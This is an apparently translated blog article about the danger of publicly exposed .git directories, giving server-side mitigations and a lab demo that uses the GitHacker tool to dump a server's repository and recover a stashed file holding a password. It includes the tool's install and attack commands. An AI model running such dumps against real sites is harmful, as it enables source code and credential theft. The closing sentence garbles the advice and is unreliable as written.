Have you tried browsing to http://yoursite.com/.git/ ? If you get a 403 error, that’s normal. Because directory browsing has blocked this access, this is a basic security feature. However, many files in the directory .git/ still accessible. So it is extremely dangerous, in this article, I will demo how to exploit the .git directory for you to see.
The dangers of the .git . directory
Anyone can use automated scanning tools like githacker to download your source code and see the full git history. Git is also a file system that follows some rules, so it’s easy to guess directories and files.
Most projects use masteror mainas the main branch, so you can easily guess the hidden path in the directory /.git/. This tool can even brute force branches and tags.
If the scan is successful, you will get the folderresulton your machine (you can customize the folder name with the option --output-dir).
Do not deloy or block access to the .git . directory
Folder .git/can contain a lot of information, including source code as well as name, email and in the worst case information accuracy encrypted (e.g. database, token, key).
You should completely block public access to that folder. Modern CI/CD and deployment solutions are relatively easy to configure and can remove directories that have nothing to do with production environments.
Some web hosting providers also block access to this directory for security reasons, but they do not always do so and it is not the default configuration. . So you need to double check your system configuration before deloying anything.
You can perform the following solutions to make your system more secure:
- Turn off directory public access
.git/by default - Add a rule that forbids access to directories in the source code, e.g. Apache configuration files
.htaccess - Do not deploy such folders in public folders
Should return 404 for directory.git/in server configuration or file .htaccess:
RedirectMatch 404 /\.git
You should add both rules if possible, as two layers of security. In case someone modifies.htaccessand delete the rule, there is still the backup rule in the directory .git/. But as far as I know, the use of file .htaccess will slow down the Apache http server.
Demo how to exploit the .git . directory
I created 2 virtual machines, Ubuntu (Server) and Kali (Attacker). In the server, I use nginx to do the webserver, I create the file index.php and commit the first time to git.
Then create a file conn.php containing the password as sensitive data and add this file to git and then stash this change.
When accessing the .git path, we will be blocked due to nginx’s security mechanism.
That’s the basic setup on the server. Now we will proceed to exploit this bug.
On kali, you run the following command to install GitHacker:
python3 -m pip install -i https://pypi.org/simple/ GitHacker
As you can see in the image below, gitHacker will be installed in the path /home/user/.local/bin.
You access this path and run the command. Replace IP-SERVER with the ip of your server.
python3 githacker --url http://IP-SERVER/.git/ --output-folder result
Go to the result folder, you will see the server’s commit.
Check logs and stash.
Restore the previously saved stash and we will have a conn.php file.
So I have successfully exploited it, don’t for the sake of convenience to pull the repo on production but always deloy the .git directory.
